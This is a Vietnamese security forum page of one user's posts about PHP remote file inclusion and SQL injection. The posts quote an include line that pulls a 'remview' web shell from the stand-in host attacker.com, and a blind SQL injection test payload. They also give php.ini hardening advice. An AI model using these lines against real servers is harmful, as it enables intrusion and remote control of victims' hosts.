banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: gamma95  XML
Profile for gamma95 Messages posted by gamma95 [ number of posts not being displayed on this page: 21 ]
 
uhm
típ đi baothu
Dạ
thứ 1: điều kiện cần và đủ để hacker chơi victim là php.ini của victim phải bật 2 cái này
allow_url_fopen = On
register_globals = On
(ko thấy bài nói tới )
Trong trường hợp này thì file config.php đã nghiễm nhiên được coi như là nằm trong host của attacker và nếu nội dung file này là một con remview thì sẽ có vấn đề xảy ra. Như vd3 đã nói với lệnh include này, toàn bộ mã của file chứa remview đã nằm gọn trong file exam2.php. Như vậy là attacker đã dùng remview để điều khiển toàn bộ host của victim.  

Host của hacker có support php ko ? ko thấy nói đến !
...
ko thấy nói đến cách dùng dấu "?" trong khi include
cách khắc phục:
nếu ko có gì vướng bận thì cho 2 cái
allow_url_fopen = off
register_globals=off
trước khi nghĩ tới cách fixed code
(... còn típ)

hehe ,mình chỉ bit là hình như có thiếu sót ... còn thiếu sót ở đâu thì ko bit ??? chắc nhờ nhiều cao thủ tìm dùm vậy smilie
hummmmm ,câu reply hơi zô ziên
ps:cả phần cách khắc phục cũng thiếu sót lớn

Code:

Code:
$mkdir= “http://attacker.com”;
Include (http://attacker.com/config.php);
[…code exam2.php] ?>


Trong trường hợp này thì file config.php đã nghiễm nhiên được coi như là nằm trong host của attacker và nếu nội dung file này là một con remview thì sẽ có vấn đề xảy ra. Như vd3 đã nói với lệnh include này, toàn bộ mã của file chứa remview đã nằm gọn trong file exam2.php. Như vậy là attacker đã dùng remview để điều khiển toàn bộ host của victim.

Tuy nhiên việc này chỉ xảy ra ở máy attacker, còn những người truy cập khác đều không có tác dụng và thực chất file exam2.php trên host victim cũng không hề bị thay đổi.  

thiếu chính xác và hơi cứng nhắc
ps:nếu bạn ko biết source của victim ,và victim cũng ko bị path diclosure (có nghĩa là bạn chỉ bit nó bị include và ko biết đc sau biến $mkdir là biến config.php thì làm sao rename file backdoor trên host hacker là config.php để làm giả cái path cho hợp lý đây ?? chả nhẽ pó tay ? )
uhm, đúng là tớ ko xem kỹ. Coi cái quote của gamma đúng là cái tool đó thuộc loại 3 xu. Nhưng rõ ràng đoạn code trên không hề có thủ tục kiểm tra tham số. Và nếu cứ đưa vào conn như vậy thì hổng quá rồi còn gì. 

bác LQ nói rõ hơn

hongvu23 wrote:
username=Replace(request("txtUserName"),"'","''")
password=Replace(Request("txtPassword"),"'","''")

strSQL="Select * from Nguoidung where username='" & username & "' and password='" & password & "'"
set rs=Server.CreateObject("ADODB.Recordset")
rs.open strSQL,conn
....
Đoạn code nè, không biết sai ở đâu nữa.
 

đoạn code vầy là thằng tool báo là blind sql ij thì đúng là tào lao thật ,nhất là cái cách nó show bằng chứng blind sql bằng cách chèn " and "1"="1 trong
Code:
txtUserName=1"+and+"1"="1&txtPassword=1&C1=on&cmdLogin=%C4%90%C4%83ng%20nh%E1%BA%ADp

thì hết nói nổi
ps:bác LQ ,hakuso đọc kĩ đề
bạn đang nói đến các kĩ thuật patch software hay là inject code thông wa lỗi buffer overflow vậy ?
thống kê tại VN năm 2006 cho thấy : môn "giáo dục giới tính" mới có nhiều người học giỏi nhất ,hơn cả thể dục và toán ...

 
Go to Page:  First Page Page 41 42 43 44 Page 46 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|